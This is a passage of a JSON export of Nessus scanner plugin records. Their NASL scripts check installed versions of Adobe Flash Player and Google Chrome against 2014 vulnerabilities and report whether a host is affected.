reference:\"flash-player-gnome-11.2.202.356-46.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.356-46.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:09:14", "description": "The remote host is missing KB2961887. It is, therefore, affected by a buffer overflow vulnerability due to improper user input validation in the Pixel Bender component. An attacker could cause a buffer overflow with a specially crafted SWF file, resulting in arbitrary code execution.", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "nessus", "title": "MS KB2961887: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB2961887.NASL", "href": "https://www.tenable.com/plugins/nessus/73742", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73742);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n script_xref(name:\"MSKB\", value:\"2961887\");\n\n script_name(english:\"MS KB2961887: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by a\nbuffer overflow vulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB2961887. It is, therefore, affected by a\nbuffer overflow vulnerability due to improper user input validation in\nthe Pixel Bender component. An attacker could cause a buffer overflow\nwith a specially crafted SWF file, resulting in arbitrary code\nexecution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2961887/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n # https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5043fc7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2961887.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 13.0.0.206\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 13 ||\n (\n iver[0] == 13 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 206)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 
13.0.0.206\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:05", "description": "The version of Google Chrome installed on the remote host is a version prior to 34.0.1847.116, and is thus affected by the following vulnerabilities :\n\n - A use-after-free error exists in the included Flash version that could lead to arbitrary code execution. (CVE-2014-0506)\n - A buffer overflow error exists in the included Flash version that could lead to arbitrary code execution. (CVE-2014-0507)\n - An unspecified error exists in the included Flash version that could allow a security bypass leading to information disclosure. (CVE-2014-0508)\n - A flaw exists related to IPC message injection. Combined with another vulnerability that allows compromising a renderer, a context-dependent attacker can bypass sandbox restrictions. (CVE-2014-1709)\n - An unspecified error exists in the included Flash version that could allow cross-site scripting attacks. (CVE-2014-0509)\n - An input-validation error exists that could allow universal cross-site scripting (UXSS) attacks. (CVE-2014-1716)\n - An unspecified out-of-bounds access error exists related to the V8 JavaScript engine. (CVE-2014-1717)\n - An integer overflow error exists related to the compositor.
(CVE-2014-1718)\n - Use-after-free errors exist related to web workers, DOM processing, rendering, speech handling and forms handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722, CVE-2014-1724, CVE-2014-1727)\n - An unspecified memory corruption error exists related to the V8 JavaScript engine. (CVE-2014-1721)\n - A URL confusion error exists related to handling RTL characters. (CVE-2014-1723)\n - An out-of-bounds read error exists related to handling 'window property' processing. (CVE-2014-1725)\n - An unspecified error exists that could allow local cross-origin bypasses. (CVE-2014-1726)\n - Various, unspecified memory handling errors exist. (CVE-2014-1728)\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1729)", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.116 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509", "CVE-2014-1716", "CVE-2014-1717", "CVE-2014-1718", "CVE-2014-1719", "CVE-2014-1720", "CVE-2014-1721", "CVE-2014-1722", "CVE-2014-1723", "CVE-2014-1724", "CVE-2014-1725", "CVE-2014-1726", "CVE-2014-1727", "CVE-2014-1728", "CVE-2014-1729"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "8208.PASL", "href": "https://www.tenable.com/plugins/nnm/8208", "sourceData": "Binary data 8208.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:31", "description": "The version of Google Chrome installed on the remote Mac OS X host is a version prior to 34.0.1847.116.
It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists in the included Flash version that could lead to arbitrary code execution.\n (CVE-2014-0506)\n\n - A buffer overflow error exists in the included Flash version that could lead to arbitrary code execution.\n (CVE-2014-0507)\n\n - An unspecified error exists in the included Flash version that could allow a security bypass leading to information disclosure. (CVE-2014-0508)\n\n - An unspecified error exists in the included Flash version that could allow cross-site scripting attacks.\n (CVE-2014-0509)\n\n - An unspecified flaw exists related to IPC message injection that allows an unauthenticated, remote attacker to bypass sandbox restrictions. (CVE-2014-1709)\n\n - An input validation error exists that could allow universal cross-site scripting (UXSS) attacks.\n (CVE-2014-1716)\n\n - An unspecified out-of-bounds access error exists related to the V8 JavaScript engine. (CVE-2014-1717)\n\n - An integer overflow error exists related to the compositor. (CVE-2014-1718)\n\n - Use-after-free errors exist related to web workers, DOM processing, rendering, speech handling and forms handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722, CVE-2014-1724, CVE-2014-1727)\n\n - An unspecified memory corruption error exists related to the V8 JavaScript engine. (CVE-2014-1721)\n\n - A URL confusion error exists related to handling RTL characters. (CVE-2014-1723)\n\n - An out-of-bounds read error exists related to handling 'window property' processing. (CVE-2014-1725)\n\n - An unspecified error exists that could allow local cross-origin bypasses. (CVE-2014-1726)\n\n - Various, unspecified memory handling errors exist.\n (CVE-2014-1728)\n\n - Various, unspecified errors exist related to the V8 JavaScript engine.
(CVE-2014-1729)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.116 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509", "CVE-2014-1709", "CVE-2014-1716", "CVE-2014-1717", "CVE-2014-1718", "CVE-2014-1719", "CVE-2014-1720", "CVE-2014-1721", "CVE-2014-1722", "CVE-2014-1723", "CVE-2014-1724", "CVE-2014-1725", "CVE-2014-1726", "CVE-2014-1727", "CVE-2014-1728", "CVE-2014-1729"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_34_0_1847_116.NASL", "href": "https://www.tenable.com/plugins/nessus/73420", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73420);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\",\n \"CVE-2014-1709\",\n \"CVE-2014-1716\",\n \"CVE-2014-1717\",\n \"CVE-2014-1718\",\n \"CVE-2014-1719\",\n \"CVE-2014-1720\",\n \"CVE-2014-1721\",\n \"CVE-2014-1722\",\n \"CVE-2014-1723\",\n \"CVE-2014-1724\",\n \"CVE-2014-1725\",\n \"CVE-2014-1726\",\n \"CVE-2014-1727\",\n \"CVE-2014-1728\",\n \"CVE-2014-1729\"\n );\n script_bugtraq_id(66704);\n\n script_name(english:\"Google Chrome < 34.0.1847.116 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks version number of Google Chrome\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 34.0.1847.116. 
It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A use-after-free error exists in the included Flash\n version that could lead to arbitrary code execution.\n (CVE-2014-0506)\n\n - A buffer overflow error exists in the included Flash\n version that could lead to arbitrary code execution.\n (CVE-2014-0507)\n\n - An unspecified error exists in the included Flash\n version that could allow a security bypass leading to\n information disclosure. (CVE-2014-0508)\n\n - An unspecified error exists in the included Flash\n version that could allow cross-site scripting attacks.\n (CVE-2014-0509)\n\n - An unspecified flaw exists related to IPC message\n injection that allows an unauthenticated, remote\n attacker to bypass sandbox restrictions. (CVE-2014-1709)\n\n - An input validation error exists that could allow\n universal cross-site scripting (UXSS) attacks.\n (CVE-2014-1716)\n\n - An unspecified out-of-bounds access error exists\n related to the V8 JavaScript engine. (CVE-2014-1717)\n\n - An integer overflow error exists related to the\n compositor. (CVE-2014-1718)\n\n - Use-after-free errors exist related to web workers,\n DOM processing, rendering, speech handling and forms\n handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722,\n CVE-2014-1724, CVE-2014-1727)\n\n - An unspecified memory corruption error exists related\n to the V8 JavaScript engine. (CVE-2014-1721)\n\n - An URL confusion error exists related to handling RTL\n characters. (CVE-2014-1723)\n\n - An out-of-bounds read error exists related to handling\n 'window property' processing. (CVE-2014-1725)\n\n - An unspecified error exists that could allow local\n cross-origin bypasses. (CVE-2014-1726)\n\n - Various, unspecified memory handling errors exist.\n (CVE-2014-1728)\n\n - Various, unspecified errors exist related to the V8\n JavaScript engine. 
(CVE-2014-1729)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2014/04/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6fd7963a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 34.0.1847.116 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'34.0.1847.116', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:24", "description": "The version of Google Chrome installed on the remote host is a version prior to 34.0.1847.116. It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists in the included Flash version that could lead to arbitrary code execution.\n (CVE-2014-0506)\n\n - A buffer overflow error exists in the included Flash version that could lead to arbitrary code execution.\n (CVE-2014-0507)\n\n - An unspecified error exists in the included Flash version that could allow a security bypass leading to information disclosure. (CVE-2014-0508)\n\n - An unspecified error exists in the included Flash version that could allow cross-site scripting attacks.\n (CVE-2014-0509)\n\n - An unspecified flaw exists related to IPC message injection that allows an unauthenticated, remote attacker to bypass sandbox restrictions. (CVE-2014-1709) \n - An input validation error exists that could allow universal cross-site scripting (UXSS) attacks.\n (CVE-2014-1716)\n\n - An unspecified out-of-bounds access error exists related to the V8 JavaScript engine. (CVE-2014-1717)\n\n - An integer overflow error exists related to the compositor. (CVE-2014-1718)\n\n - Use-after-free errors exist related to web workers, DOM processing, rendering, speech handling and forms handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722, CVE-2014-1724, CVE-2014-1727)\n\n - An unspecified memory corruption error exists related to the V8 JavaScript engine. (CVE-2014-1721)\n\n - An URL confusion error exists related to handling RTL characters. 
(CVE-2014-1723)\n\n - An out-of-bounds read error exists related to handling 'window property' processing. (CVE-2014-1725)\n\n - An unspecified error exists that could allow local cross-origin bypasses. (CVE-2014-1726)\n\n - Various, unspecified memory handling errors exist.\n (CVE-2014-1728)\n\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1729)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.116 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509", "CVE-2014-1709", "CVE-2014-1716", "CVE-2014-1717", "CVE-2014-1718", "CVE-2014-1719", "CVE-2014-1720", "CVE-2014-1721", "CVE-2014-1722", "CVE-2014-1723", "CVE-2014-1724", "CVE-2014-1725", "CVE-2014-1726", "CVE-2014-1727", "CVE-2014-1728", "CVE-2014-1729"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_34_0_1847_116.NASL", "href": "https://www.tenable.com/plugins/nessus/73419", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73419);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\",\n \"CVE-2014-1709\",\n \"CVE-2014-1716\",\n \"CVE-2014-1717\",\n \"CVE-2014-1718\",\n \"CVE-2014-1719\",\n \"CVE-2014-1720\",\n \"CVE-2014-1721\",\n \"CVE-2014-1722\",\n \"CVE-2014-1723\",\n \"CVE-2014-1724\",\n \"CVE-2014-1725\",\n \"CVE-2014-1726\",\n \"CVE-2014-1727\",\n \"CVE-2014-1728\",\n \"CVE-2014-1729\"\n );\n script_bugtraq_id(66704);\n\n script_name(english:\"Google Chrome < 
34.0.1847.116 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote host is a version\nprior to 34.0.1847.116. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists in the included Flash\n version that could lead to arbitrary code execution.\n (CVE-2014-0506)\n\n - A buffer overflow error exists in the included Flash\n version that could lead to arbitrary code execution.\n (CVE-2014-0507)\n\n - An unspecified error exists in the included Flash\n version that could allow a security bypass leading to\n information disclosure. (CVE-2014-0508)\n\n - An unspecified error exists in the included Flash\n version that could allow cross-site scripting attacks.\n (CVE-2014-0509)\n\n - An unspecified flaw exists related to IPC message\n injection that allows an unauthenticated, remote\n attacker to bypass sandbox restrictions. (CVE-2014-1709)\n \n - An input validation error exists that could allow\n universal cross-site scripting (UXSS) attacks.\n (CVE-2014-1716)\n\n - An unspecified out-of-bounds access error exists\n related to the V8 JavaScript engine. (CVE-2014-1717)\n\n - An integer overflow error exists related to the\n compositor. (CVE-2014-1718)\n\n - Use-after-free errors exist related to web workers,\n DOM processing, rendering, speech handling and forms\n handling. (CVE-2014-1719, CVE-2014-1720, CVE-2014-1722,\n CVE-2014-1724, CVE-2014-1727)\n\n - An unspecified memory corruption error exists related\n to the V8 JavaScript engine. (CVE-2014-1721)\n\n - An URL confusion error exists related to handling RTL\n characters. (CVE-2014-1723)\n\n - An out-of-bounds read error exists related to handling\n 'window property' processing. 
(CVE-2014-1725)\n\n - An unspecified error exists that could allow local\n cross-origin bypasses. (CVE-2014-1726)\n\n - Various, unspecified memory handling errors exist.\n (CVE-2014-1728)\n\n - Various, unspecified errors exist related to the V8\n JavaScript engine. (CVE-2014-1729)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2014/04/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6fd7963a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 34.0.1847.116 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'34.0.1847.116', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:09:14", "description": "The version of Google Chrome installed on the remote host is a version prior to 34.0.1847.131. It is, therefore, affected by the following vulnerabilities :\n\n - A buffer overflow error exists related to the included version of Flash Player. (CVE-2014-0515)\n\n - Type confusion errors exist related to the V8 JavaScript engine and DOM handling. (CVE-2014-1730, CVE-2014-1731)\n\n - A use-after-free error exists related to speech recognition processing. (CVE-2014-1732)\n\n - An error exists related to compiling in 'Seccomp-BPF'.\n (CVE-2014-1733)\n\n - Various, unspecified errors exist. (CVE-2014-1734)\n\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1735)\n\n - An integer overflow error exists related to the V8 JavaScript engine. 
(CVE-2014-1736)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-04-25T00:00:00", "type": "nessus", "title": "Google Chrome < 34.0.1847.131 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515", "CVE-2014-1730", "CVE-2014-1731", "CVE-2014-1732", "CVE-2014-1733", "CVE-2014-1734", "CVE-2014-1735", "CVE-2014-1736"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_34_0_1847_131.NASL", "href": "https://www.tenable.com/plugins/nessus/73710", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73710);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0515\",\n \"CVE-2014-1730\",\n \"CVE-2014-1731\",\n \"CVE-2014-1732\",\n \"CVE-2014-1733\",\n \"CVE-2014-1734\",\n \"CVE-2014-1735\",\n \"CVE-2014-1736\"\n );\n script_bugtraq_id(\n 67082,\n 67092,\n 67521,\n 67572\n );\n\n script_name(english:\"Google Chrome < 34.0.1847.131 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote host is a version\nprior to 34.0.1847.131. It is, therefore, affected by the following\nvulnerabilities :\n\n - A buffer overflow error exists related to the included\n version of Flash Player. (CVE-2014-0515)\n\n - Type confusion errors exist related to the V8\n JavaScript engine and DOM handling. (CVE-2014-1730,\n CVE-2014-1731)\n\n - A use-after-free error exists related to speech\n recognition processing. 
(CVE-2014-1732)\n\n - An error exists related to compiling in 'Seccomp-BPF'.\n (CVE-2014-1733)\n\n - Various, unspecified errors exist. (CVE-2014-1734)\n\n - Various, unspecified errors exist related to the V8\n JavaScript engine. (CVE-2014-1735)\n\n - An integer overflow error exists related to the V8\n JavaScript engine. (CVE-2014-1736)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2014/04/stable-channel-update_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5291952\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 34.0.1847.131 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'34.0.1847.131', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:16:22", "description": "The version of Google Chrome installed on the remote Mac OS X host is a version prior to 34.0.1847.131. It is, therefore, affected by the following vulnerabilities :\n\n - A buffer overflow error exists related to the included version of Flash Player. (CVE-2014-0515)\n\n - Type confusion errors exist related to the V8 JavaScript engine and DOM handling. (CVE-2014-1730, CVE-2014-1731)\n\n - A use-after-free error exists related to speech recognition processing. (CVE-2014-1732)\n\n - An error exists related to compiling in 'Seccomp-BPF'.\n (CVE-2014-1733)\n\n - Various, unspecified errors exist. (CVE-2014-1734)\n\n - Various, unspecified errors exist related to the V8 JavaScript engine. (CVE-2014-1735)\n\n - An integer overflow error exists related to the V8 JavaScript engine. 
